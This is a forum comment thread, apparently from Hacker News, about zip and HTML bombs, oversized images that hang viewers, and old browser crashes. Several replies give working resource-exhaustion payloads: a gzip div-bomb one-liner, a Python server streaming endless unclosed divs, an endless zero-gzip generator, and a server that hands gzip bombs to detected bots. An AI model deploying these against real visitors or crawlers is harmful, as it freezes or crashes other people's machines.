
Comment by layer8 (7 months ago)

Back when I was a stupid kid, I once did

    ln -s /dev/zero index.html

on my home page as a joke. Browsers at the time didn’t like that: they basically froze, sometimes taking the client system down with them.

Later on, browsers started to check for actual content I think, and would abort such requests.

I made a 64kx64k JPEG once by feeding the encoder the same line of macroblocks until it produced the entire image.

Years later I was finally able to open it.

  • I had a ton of trouble opening a 10MB or so PNG a few weeks back. It was stitched-together screenshots forming a map of some areas in a game, so it was quite large. Some stuff refused to open it at all as if the file was invalid, some would hang for minutes, some opened blurry. My first semi-success was Fossify Gallery on my phone from F-Droid. If I let it chug a bit, it'd show a blurry image; a while longer and it'd come into focus. Then I'd try to zoom or pan and it'd blur for ages again. I guess it was aggressively lazy-loading. What worked in the end was GIMP. I had the thought that the image was probably made in an editor, so surely an editor could open it. The catch is that it took like 8GB of RAM, but then I could see clearly, zoom, and pan all I wanted. It made me wonder why there's not an image viewer that's just the viewer part of GIMP or something.

    Among things that didn't work were qutebrowser, icecat, nsxiv, feh, imv, mpv. I did worry at first that the file was corrupt; I was redownloading it, comparing hashes with a friend, etc. Makes for an interesting benchmark, I guess.

    For others curious, here's the file: https://0x0.st/82Ap.png

    I'd say just curl/wget it, don't expect it to load in a browser.

    • That's a 36,000x20,000 PNG, 720 megapixels. Many decoders explicitly limit the maximum image area they'll handle, under the reasonable assumption that it would exceed available RAM and take too long, and that the file was crafted maliciously or by mistake. (A short Pillow-based sketch of this kind of limit follows after these replies.)

    • On Firefox on Android on my pretty old phone, a blurry preview rendered in about 10 seconds, and it was fully rendered in 20-something seconds. Smooth panning and zooming the entire time.


    • I use Honeyview for reading comics etc. It can handle this.

      Old-school ACDSee would have been fine too.

      I think it's all the pixel processing in the modern image viewers (or they're just using system web views that aren't 100% just a straight render).

      I suspect that the more native renderers are doing some extra magic here. Or just being significantly more OK with using up all your RAM.

    • IrfanView was able to load it in about 8 seconds (Ryzen 7 5800x) using 2.8GB of RAM, but zooming/panning is quite slow (~500ms per action)


    • Firefox on a mid-tier Samsung and a cheapo data connection (4G) took about 30s to load. I could pan, but it wouldn't let me zoom much, and the little I could zoom in looked quite blurry.

    • For what it's worth, this loaded (slowly) in Firefox on Windows for me (but zooming was blurry), and the default Photos viewer opened it no problem with smooth zooming and panning.

    • On my Waterfox 6.5.6, it opened but remained blurry when zoomed in. MS Paint refused to open it. The GIMP v2.99.18 crashed and took my display driver with it. Windows 10 Photo Viewer surprisingly managed to open it and keep it sharp when zoomed in. The GIMP v3.0.2 (latest version at the time of writing) crashed.

    • Safari on my MacBook Air opened it fine, though it took about four seconds. Zooming works fine as well. It does take ~3GB of memory according to Activity Monitor.

    • ImgurViewer from F-Droid on an FP5 opened it blurry after around 5s, and 5s later it was rendered completely.

      Pan&zoom works instantly with a blurry preview and then takes another 5-10s to render completely.

    • > don't expect it to load in a browser

      Takes a few seconds, but otherwise seems pretty ok in desktop Safari. Preview.app also handles it fine (albeit does allocate an extra ~1-2GB of RAM)

    • Loads fine and fairly quickly on a MacBook Pro M3 Pro with Firefox 137. Does have a bit of delay when initially zooming in, but pans and zooms fine after.

    • Loading this on my iPhone on 1 Gbit took about 5s and I can easily pan and zoom. A desktop should handle it beautifully.

    • It loaded after 10-15 seconds on my iPad Pro M1, although it did start reloading after I looked around in it.

    • On mobile, Brave just displayed it as the placeholder broken-link image, but in Firefox it loaded in about 10s.
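
      To make the decoder-limit point concrete: Pillow is one decoder that ships such a guard, refusing to even decode images whose pixel count exceeds a ceiling (MAX_IMAGE_PIXELS, roughly 89.5 megapixels by default; anything past twice that is rejected outright as a suspected decompression bomb). A minimal sketch, assuming the linked file has been saved locally as 82Ap.png:

          # Pillow's built-in decompression-bomb guard. A 36,000 x 20,000 image is
          # ~720 megapixels, far beyond the default ceiling, so open() raises
          # instead of attempting to decode it.
          from PIL import Image

          try:
              img = Image.open("82Ap.png")  # assumed local copy of the linked file
              img.load()
          except Image.DecompressionBombError as exc:
              print("decoder refused the image:", exc)

          # Opting in to huge images means raising or removing the ceiling:
          # Image.MAX_IMAGE_PIXELS = None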

  • I once encoded an entire TV OP into a multi-megabyte animated cursor (.ani) file.

    Surprisingly, Windows 95 didn't die trying to load it, but quite a lot of operations in the system took noticeably longer than they normally did.

I wonder if I could create a 500TB HTML file with proper headers on a squashfs, an endless <div><div><div>... with no closing tags, and whether I could instruct the server not to report the file size before download.

Any ideas?

  • Why use squashfs when you can do what OP did and serve a compressed version, so that the client is overwhelmed by both the decompression and the DOM depth:

    yes "<div>" | dd bs=1M count=10240 iflag=fullblock | gzip | pv > zipdiv.gz

    The resulting file is about 15 MiB and decompresses into a 10 GiB monstrosity containing 1789569706 unclosed nested divs.

  • Yes, servers can respond without specifying the size by using chunked transfer encoding. And you can do the rest with a custom web server that just handles requests by returning "<div>" in a loop. I have no idea if browsers are vulnerable to such a thing. (A minimal sketch follows after the reply below.)

    • I just tested it via a small Python script sending divs at a rate of ~900 MB/s (as measured by curl). Firefox just kills the request after 1-2 GB received (~2 seconds) with an "out of memory" error, while Chrome seems to only receive around 1 MB/s, uses one CPU core at 100%, and grows indefinitely in memory use. I killed it after 3 minutes, by which point it was consuming about 6 GB (on top of the memory it had used at startup).

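    A minimal sketch of such a server, assuming nothing beyond Python 3's standard library (the address, port, and chunk size are arbitrary): it answers every GET with chunked transfer encoding, so no size is ever announced, and keeps writing "<div>" chunks until the client disconnects.

        # Stream "<div>" forever over chunked transfer encoding, never announcing
        # a response size. Host, port, and chunk size are illustrative choices.
        from http.server import BaseHTTPRequestHandler, HTTPServer

        PAYLOAD = b"<div>" * 1024  # ~5 KiB of unclosed divs per chunk

        class DivBomb(BaseHTTPRequestHandler):
            protocol_version = "HTTP/1.1"  # chunked encoding requires HTTP/1.1

            def do_GET(self):
                self.send_response(200)
                self.send_header("Content-Type", "text/html")
                self.send_header("Transfer-Encoding", "chunked")
                self.end_headers()
                try:
                    while True:
                        # each chunk is: hex length, CRLF, payload, CRLF
                        self.wfile.write(b"%x\r\n%s\r\n" % (len(PAYLOAD), PAYLOAD))
                except (BrokenPipeError, ConnectionResetError):
                    pass  # client gave up or was killed

        if __name__ == "__main__":
            HTTPServer(("127.0.0.1", 8080), DivBomb).serve_forever()

    A well-behaved chunked response would end with a zero-length chunk; the whole point here is that it never does.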

Maybe it's time for a /dev/zipbomb device.

  • ln -s /dev/urandom /dev/zipbomb && echo 'Boom!'

    OK, not a real zip bomb; for that we would need a kernel module.

    • > Ok, not a real zip bomb, for that we would need a kernel module.

      Or a userland fusefs program, a nice funky idea actually (with configurable dynamic filenames, e.g. `mnt/10GiB_zeropattern.zip`...).
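
      No kernel module (or FUSE layer) is strictly needed to sketch the idea: a userland generator can emit an effectively endless gzip stream of zeros, which is what such a device or synthetic file would hand out on every read. A rough sketch, with an arbitrary chunk size:

          # A userland "zip bomb faucet": an endless gzip stream of zeros, suitable
          # for piping into a file, a socket, or a FUSE read handler.
          import sys
          import zlib

          CHUNK = 1 << 20  # feed the compressor 1 MiB of zeros per iteration

          def zero_gzip_stream():
              comp = zlib.compressobj(9, zlib.DEFLATED, 31)  # wbits=31 -> gzip framing
              zeros = b"\x00" * CHUNK
              while True:
                  yield comp.compress(zeros)  # roughly 1 KiB out per MiB in

          if __name__ == "__main__":
              # e.g. pipe the output to a file or a listening socket; stop with Ctrl-C
              for block in zero_gzip_stream():
                  sys.stdout.buffer.write(block)

      The stream is never flushed, so the gzip trailer never arrives; a client that insists on a complete member will read until it runs out of patience or memory.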

Wait, you set up a symlink?

I am not sure how that could’ve worked. Unless the real /dev tree was exposed to your webserver’s chroot environment, this would’ve given nothing special except “file not found”.

The whole point of chroot for a webserver was to shield clients from accessing special files like that!

Could server-side includes be used for an HTML bomb?

Write an ordinary static HTML page and fill a <p> with infinite random data using <!--#include file="/dev/random"-->.

Or would that crash the server?

  • I guess it depends on the server's implementation. But since you need some logic to decide when to serve the HTML bomb anyway, I don't see why you would prefer this solution. Just have whatever script you're using to detect the bots serve the bomb.
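
    A rough sketch of that approach, assuming stock Python 3 and a purely illustrative User-Agent check (the patterns, address, and payload size are placeholders, not a real bot-detection scheme):

        # Serve a gzip bomb to clients whose User-Agent matches a crude pattern
        # list, and a normal page to everyone else. Everything here is illustrative.
        import gzip
        from http.server import BaseHTTPRequestHandler, HTTPServer

        BOMB = gzip.compress(b"<div>" * 10_000_000, 9)  # ~50 MB of divs, small once gzipped
        SUSPECT_AGENTS = ("curl", "python-requests", "Scrapy")  # placeholder patterns

        class PickyServer(BaseHTTPRequestHandler):
            def do_GET(self):
                ua = self.headers.get("User-Agent", "")
                if any(p in ua for p in SUSPECT_AGENTS):
                    body = BOMB
                    self.send_response(200)
                    self.send_header("Content-Encoding", "gzip")  # the client inflates it
                else:
                    body = b"<!doctype html><p>hello</p>"
                    self.send_response(200)
                self.send_header("Content-Type", "text/html")
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)

        if __name__ == "__main__":
            HTTPServer(("127.0.0.1", 8080), PickyServer).serve_forever()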

Divide by zero happens to everyone eventually.

https://medium.com/@bishr_tabbaa/when-smart-ships-divide-by-...

"On 21 September 1997, the USS Yorktown halted for almost three hours during training maneuvers off the coast of Cape Charles, Virginia due to a divide-by-zero error in a database application that propagated throughout the ship’s control systems."

"[A] technician tried to digitally calibrate and reset the fuel valve by entering a 0 value for one of the valve’s component properties into the SMCS Remote Database Manager (RDM)"

We discovered back when IE3 came out that you could crash Windows by leaving off a table closing tag.